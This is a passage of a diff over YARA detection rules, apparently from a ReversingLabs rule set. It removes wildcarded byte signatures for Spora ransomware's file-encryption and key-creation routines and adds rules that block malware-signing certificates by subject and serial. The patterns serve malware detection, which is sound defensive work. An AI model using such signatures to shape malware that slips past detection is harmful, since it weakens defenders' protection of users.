?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ?? - ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 3D - ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? - ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 ED 89 - 6C 24 ?? 39 6C 24 ?? 0F 86 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 DB 0F 8E ?? ?? ?? ?? C1 - E5 ?? 8B F3 89 6C 24 ?? 89 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 83 BC 2C ?? ?? ?? ?? ?? - 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 84 2C ?? ?? ?? ?? 66 83 78 ?? ?? 8D - 50 ?? 74 ?? 8D B4 24 ?? ?? ?? ?? 8D 48 ?? 8A 01 8D 52 ?? 88 06 8D 76 ?? 66 83 3A - } - $enum_resources_1_p2 = { - 8D 49 ?? 75 ?? 8B 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 - 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B4 2C ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? FF 70 ?? 8B 40 ?? 83 E0 ?? 50 8D 84 24 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? C6 44 24 ?? ?? 8B 56 ?? - F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 - A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 44 00 ?? 8A 41 ?? 8D - 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? - 88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? - ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? - 88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? - 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ?? - 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6 - } - $enum_resources_1_p3 = { - C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? - ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F6 C2 ?? 74 ?? 8D - 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 - 89 41 ?? 84 D2 79 ?? 8D 4C 24 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? - ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 - 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? - ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 - ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? - ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 - 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D - 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 - ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? - ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74 - } - $enum_resources_2_p1 = { - 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? - ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? - 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? - ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? - 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? - ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 - 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C - 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 - 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? - ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A - 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 - ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 - A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? - ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 - } - $enum_resources_2_p2 = { - 01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D - 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 - 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? - ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 - 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 - C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 - 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 85 D2 79 - ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 - 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? - ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 - 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? 8D 4C 24 ?? 8D 51 ?? 8A 01 - 41 84 C0 75 ?? 2B CA 56 88 44 0C ?? FF D7 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D - } - $enum_resources_2_p3 = { - 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? FF D7 8B BC 2C ?? ?? ?? ?? 33 D2 - 8B CF 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74 ?? 8B 6C 24 ?? 8B DF 8B - CB 42 8D 71 ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C - 24 ?? 8B 5C 24 ?? 8B CF 33 D2 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74 - ?? 8B 9C 2C ?? ?? ?? ?? 8B 6C 24 ?? 0F 1F 40 ?? 8B CB 42 8D 71 ?? 8A 01 41 84 C0 75 - ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C 24 ?? 8B 5C 24 ?? 33 D2 8D 4F ?? 8A 07 47 - 84 C0 75 ?? 2B F9 8D 43 ?? 03 C7 74 ?? 8B BC 2C ?? ?? ?? ?? 0F 1F 40 ?? 8B C7 42 8D - 70 ?? 8A 08 40 84 C9 75 ?? 2B C6 40 03 C3 3B D0 72 ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ?? - 83 EE ?? 89 74 24 ?? 0F 85 ?? ?? ?? ?? 8B 6C 24 ?? 8B F5 C1 E6 ?? 8B 84 34 ?? ?? ?? - ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 - ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA - } - $enum_resources_2_p4 = { - 8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 4C 24 ?? E8 ?? ?? ?? - ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ?? - 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85 - C0 75 ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 66 - 8B 01 83 C1 ?? 66 85 C0 75 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? - ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 E9 - ?? ?? ?? ?? 8B CA 8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? - ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? F6 84 34 ?? ?? ?? ?? ?? 74 ?? 8D - 8C 24 ?? ?? ?? ?? 8D 53 ?? 03 CE E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 45 89 6C 24 ?? 3B - 6C 24 ?? 0F 82 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 F6 8B 44 24 ?? 83 F8 ?? - 72 ?? 8B 4C 24 ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? - 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83 - C4 ?? 5F 8B C6 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($encrypt_files_p*)) and ($find_files) and ( all of ($enum_resources_1_p*)) and ( all of ($enum_resources_2_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PhaseQ Limited" and pe.signatures[i].serial=="0a:46:65:53:a6:39:1a:af:d1:81:b4:00:26:6c:7b:18" and 1555545600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Spora : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0D3Dec8794Fa7228D1Ee40Eeb8187149 : INFO FILE { meta: - description = "Yara rule that detects Spora ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f07ee1d4-d99b-5cbf-a1f0-a3802d9e3b47" - date = "2020-07-15" - modified = "2020-07-15" + id = "54e9ec00-d054-521b-b60b-81efe3a8ce12" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Spora.yara#L1-L124" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4e18bb42277ce9194bf75fa45d95ea7e2bd51c5d7791d3d6e013fc07626e65b0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13258-L13274" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "20084dc0b069d65755f859f5aef4be5599d1f066ba006199d3ce803b0d8f041e" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Spora" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 57 FF 75 ?? 33 FF 89 7D ?? FF 15 ?? ?? ?? ?? 83 F8 - ?? 0F 84 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 53 56 57 BE - ?? ?? ?? ?? 56 6A ?? 57 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB - ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F - 82 ?? ?? ?? ?? 6A ?? 57 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? - ?? 57 8D 45 ?? 50 56 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 39 75 - ?? 0F 85 ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F - 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 3B - 45 ?? 0F 84 ?? ?? ?? ?? 39 7D ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? B9 ?? ?? - ?? ?? 3B C1 72 ?? 89 4D ?? EB ?? 83 E0 ?? 89 45 ?? 57 FF 75 ?? 57 6A ?? 57 53 FF 15 - ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? FF 75 ?? 57 57 6A ?? 50 FF 15 ?? ?? ?? - ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57 FF - 75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57 - FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 57 57 - 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? - 57 57 53 89 45 ?? FF 15 ?? ?? ?? ?? 57 8D 45 ?? 50 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 - 53 FF D6 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF D6 C7 45 ?? ?? ?? ?? ?? FF 75 ?? FF - 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? - ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 5E 5B 8B 45 ?? 5F 83 C5 ?? C9 C2 - } - $create_key_file = { - 55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? 33 F6 89 75 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F - 84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D - ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 45 - ?? 50 56 6A ?? 56 FF 35 ?? ?? ?? ?? FF D7 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0 - ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 56 56 56 FF 75 ?? FF D7 85 C0 0F 84 ?? ?? ?? ?? - 53 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B F8 3B FE 0F 84 ?? ?? ?? ?? 56 6A - ?? 57 56 FF 15 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50 - FF 15 ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? - 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 68 - ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7D ?? - ?? ?? ?? ?? 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? 57 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B D8 3B DE 74 ?? 89 75 ?? 8B 45 - ?? 56 FF 74 85 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF - 15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 57 FF 15 ?? ?? ?? ?? FF - 45 ?? 83 7D ?? ?? 72 ?? 53 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 57 FF - 15 ?? ?? ?? ?? 5B FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B 45 ?? 5E 83 C5 ?? C9 C2 - } - $create_key = { - 55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 57 8D 45 ?? 50 8D 45 ?? 50 - 33 DB 53 6A ?? 53 FF 75 ?? BE ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 53 6A ?? 53 FF 35 ?? ?? ?? ?? - FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0 ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? - 53 53 53 FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 8B 35 ?? ?? ?? ?? - 03 C8 51 6A ?? FF D6 8B F8 89 7D ?? 3B FB 0F 84 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 57 FF - 15 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 8B 45 ?? 03 C7 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83 - C4 ?? 8D 45 ?? 50 8B 45 ?? 53 6A ?? 03 C8 51 57 8B 3D ?? ?? ?? ?? FF D7 85 C0 74 ?? - FF 75 ?? 6A ?? FF D6 8B F0 3B F3 74 ?? 8B 4D ?? 8D 45 ?? 50 8B 45 ?? 56 6A ?? 03 C8 - 51 FF 75 ?? FF D7 33 FF 38 1E 74 ?? 8B C6 80 38 ?? 75 ?? 40 40 8A 08 88 0C 37 47 40 - 38 18 75 ?? 88 1C 37 EB ?? 8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 75 ?? FF 75 - ?? FF 15 ?? ?? ?? ?? 5F 5B EB ?? 8B 75 ?? 8B C6 5E 83 C5 ?? C9 C2 - } - $create_lst_file = { - 55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 53 56 68 ?? ?? ?? ?? 33 F6 6A ?? 89 75 ?? FF 15 ?? - ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 45 ?? 8B 38 8D 45 - ?? 50 53 83 C7 ?? FF 15 ?? ?? ?? ?? 03 C0 50 53 FF 75 ?? FF 17 8B 45 ?? 8B 08 8D 55 - ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 53 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 8B 08 - 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? - 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? - 8B 3D ?? ?? ?? ?? 56 56 56 56 6A ?? 50 56 68 ?? ?? ?? ?? FF D7 89 45 ?? 3B C6 0F 84 - ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 56 - 56 FF 75 ?? 50 6A ?? FF 75 ?? 56 68 ?? ?? ?? ?? FF D7 8D 45 ?? 50 6A ?? 68 ?? ?? ?? - ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 E0 ?? 83 - C0 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D ?? - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF - 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 56 56 - 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 6A ?? 53 56 FF 15 ?? ?? ?? - ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4 - ?? 57 53 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? - 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57 - 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 7D ?? 75 ?? FF 75 ?? C7 45 ?? - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 3B FE 74 ?? 56 6A ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 - 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50 FF 15 ?? ?? ?? ?? 83 - C4 ?? 56 57 53 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? - ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? - 5F 8B 45 ?? 8B 08 50 FF 51 ?? 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 5E 5B 83 C5 ?? C9 C2 - } - $enumerate_resources = { - 55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 - ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 BE ?? ?? ?? ?? 56 6A ?? FF D3 8B F8 89 7D ?? - 85 FF [2-8] 83 4D ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? 89 75 ?? E8 - ?? ?? ?? ?? 85 C0 75 ?? 39 45 ?? 74 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 [0-3] - E8 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 36 FF 15 ?? ?? ?? ?? 8D 44 00 ?? 50 6A - ?? FF D3 8B F8 85 FF 74 ?? FF 36 57 FF 15 ?? ?? ?? ?? [0-5] 57 E8 ?? ?? ?? - ?? 57 FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 75 ?? 8B 7D ?? 57 FF 15 ?? ?? ?? ?? FF 75 - ?? E8 ?? ?? ?? ?? 5F 5E 5B C9 C2 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Financial Security Institute, Inc." and pe.signatures[i].serial=="0d:3d:ec:87:94:fa:72:28:d1:ee:40:ee:b8:18:71:49" and 1582675200<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_24Af70B5D17A63Ad053E5821 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "034228b3-1864-5a76-ad9d-531778be10ec" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = 